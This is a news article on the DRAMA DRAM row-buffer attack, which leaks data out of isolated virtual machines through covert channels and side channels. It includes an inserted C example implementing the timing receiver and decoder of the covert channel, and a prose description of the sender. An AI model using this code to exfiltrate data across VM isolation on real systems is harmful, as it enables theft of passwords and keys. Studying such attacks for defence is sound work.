DRAMA: New attack stealthily steals data from isolated virtual machines

    At the Black Hat Europe conference, held November 1-4 in London, Austrian researchers presented a new attack that exploits the way the CPU addresses DRAM. The method lets attackers, even from JavaScript, steal sensitive information directly out of virtual machines. The attack is called DRAMA.

    How it works

    Researchers Anders Fogh and Michael Schwarz demonstrated several cross-processor attacks during their presentation. The first part of their research was presented at the USENIX Security Symposium in August this year.

    At Black Hat, the authors showed how attackers using JavaScript can intercept small "chunks" of sensitive data, such as passwords or private keys, from virtual machines that are not even connected to the network.

    There are two attack scenarios:

    • In the first, two processes, one in the virtual machine and one in the host system, communicate with each other (a covert channel).
    • In the second, one process monitors which memory addresses another process uses (a side channel).

    Consider the first scenario. The goal here is to transfer data from a virtual machine (VM) that has no network access to the host system, from where the attacker then exfiltrates it over the network.

    This is possible because of how DRAM is organized: the sending process (in the VM) and the receiving process (on the host) use memory addresses that fall into the same DRAM bank. Each bank has a row buffer that holds the most recently opened row, so if a process has just accessed a row in a bank, accessing that same row again is fast (a row hit), whereas accessing a different row in the same bank forces the row buffer to be reloaded and takes measurably longer (a row conflict).

    If the sender touched its own row in that bank between two of the receiver's accesses, the receiver's second access hits a row conflict and takes longer; this is read as a 1 bit. If the sender stayed idle in that interval, the access stays fast and is read as a 0 bit.

    The main task is therefore to obtain addresses in a shared bank (or in several banks, to raise the transfer rate) and to agree on the timing of the two processes' accesses. To solve it, the authors relied on features common to modern systems: 2 MB huge pages, which expose the low physical address bits that select the bank, and a receiver polling rate several times higher than the sender's bit rate, so that every bit is sampled more than once. Knowing this, the researchers could make reliable assumptions about the behavior of the target system.
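    The receiver side of that encoding, as an added example that is not the researchers' code: a timed uncached access (x86-64 only, using clflush and rdtscp), a threshold calibrated from hit and conflict timings, and a decoder that turns a run of samples into bytes by majority vote over each bit period. The names timed_dram_access, calibrate_threshold, decode_samples and the sample values are assumptions made for this example; the hard part the article describes, finding addresses that share a bank, is assumed to be done already.

```c
/* Added example (not the researchers' code): the receiver half of a DRAMA-style
 * covert channel over DRAM row-buffer timing. Assumed, not from the article:
 * sender and receiver already hold addresses in the same bank but different rows,
 * the sender holds each bit for a fixed period, and the receiver takes
 * samples_per_bit timed accesses per period (it polls faster than the sender). */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#ifdef __x86_64__
#include <x86intrin.h>
/* One uncached access to addr, timed in cycles. clflush evicts the line so the
 * load is served by DRAM; its latency then shows a row hit (fast) or conflict (slow). */
uint64_t timed_dram_access(volatile uint8_t *addr)
{
    unsigned aux;
    _mm_clflush((const void *)addr);
    _mm_mfence();
    uint64_t t0 = __rdtscp(&aux);
    (void)*addr;                        /* volatile read: the access is performed */
    uint64_t t1 = __rdtscp(&aux);
    return t1 - t0;
}
#endif

static int cmp_u64(const void *a, const void *b)
{
    uint64_t x = *(const uint64_t *)a, y = *(const uint64_t *)b;
    return (x > y) - (x < y);
}

static uint64_t median_u64(const uint64_t *in, size_t n)
{
    uint64_t *tmp = malloc(n * sizeof *tmp), m;
    memcpy(tmp, in, n * sizeof *tmp);
    qsort(tmp, n, sizeof *tmp, cmp_u64);
    m = tmp[n / 2];
    free(tmp);
    return m;
}

/* Threshold halfway between the median hit timing (sender idle) and the median
 * conflict timing (sender hammering its row), both taken in a calibration phase. */
uint64_t calibrate_threshold(const uint64_t *hit, size_t nh,
                             const uint64_t *conflict, size_t nc)
{
    return (median_u64(hit, nh) + median_u64(conflict, nc)) / 2;
}

/* Turn timing samples into bytes. A bit period is 1 when the majority of its
 * samples are slower than threshold, else 0; the vote absorbs single outliers from
 * other processes touching the bank. Bits are packed MSB-first; returns bytes written. */
size_t decode_samples(const uint64_t *samples, size_t n, size_t samples_per_bit,
                      uint64_t threshold, uint8_t *out, size_t out_len)
{
    size_t nbytes = (n / samples_per_bit) / 8;
    if (nbytes > out_len) nbytes = out_len;
    memset(out, 0, nbytes);
    for (size_t b = 0; b < nbytes * 8; b++) {
        size_t slow = 0;
        for (size_t k = 0; k < samples_per_bit; k++)
            slow += samples[b * samples_per_bit + k] > threshold;
        if (slow * 2 > samples_per_bit)
            out[b / 8] |= (uint8_t)(0x80u >> (b % 8));
    }
    return nbytes;
}

/* Constructed calibration samples (made up for this example, not measured). */
uint64_t demo_threshold(void)
{
    static const uint64_t hit[] = {200, 210, 190, 205};
    static const uint64_t conflict[] = {400, 410, 390, 405};
    return calibrate_threshold(hit, 4, conflict, 4);
}

/* Constructed samples encoding 'A' (0x41 = 0100 0001) at 4 samples per bit; the
 * second period has a fast outlier and the third a slow one (another app hit
 * the bank), which the majority vote must tolerate. */
int demo_decoded_byte(void)
{
    static const uint64_t samples[] = {
        200, 210, 190, 205,  400, 410, 200, 405,  /* 0 1 */
        200, 410, 190, 205,  200, 210, 190, 205,  /* 0 0 */
        200, 210, 190, 205,  200, 210, 190, 205,  /* 0 0 */
        200, 210, 190, 205,  400, 410, 390, 405,  /* 0 1 */
    };
    uint8_t out[1];
    size_t n = decode_samples(samples, sizeof samples / sizeof samples[0], 4,
                              demo_threshold(), out, sizeof out);
    return n == 1 ? out[0] : -1;
}

int main(void)
{
    printf("decoded from constructed samples: 0x%02x\n", demo_decoded_byte());
    return 0;
}
```

    The sender's half is the mirror image: for a 1 it accesses its own row in the shared bank in a tight loop (flushing it from the cache each time so the access really reaches DRAM) for the whole bit period, and for a 0 it stays idle. The clflush before each timed load matters because a cache hit would otherwise hide the DRAM timing entirely; the threshold must be recalibrated per machine since absolute cycle counts vary with the memory controller and clock.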

    In the second scenario the attack resembles side-channel attacks on the processor cache. Knowing which addresses a process accesses, an attacker can infer the data fed into it, for example the address of the site the user is typing into the browser's address bar.

    There is no easy defense.

    The researchers' attack requires neither exploiting a vulnerability nor running privileged malicious code on the host system: the two cooperating processes simply open a covert channel between the virtual machine and the host.

    At the same time, Fogh and Schwarz admit that the transfer will not always succeed: the bank used to leak the data may also be in use by other applications, whose accesses add noise and can prevent the information from leaving the virtual machine, although the probability of this is not high.

    The researchers focused on testing their attack on the Intel x86-64 platform, but they found that other architectures, for example the ARM processors in smartphones, are also vulnerable.

    Because the attack relies on how DRAM itself works, the researchers are sure there is no simple countermeasure. They do not, however, expect many such attacks on real systems in the coming years. Still, the very possibility shows that developers need to harden not only software but also the hardware itself.
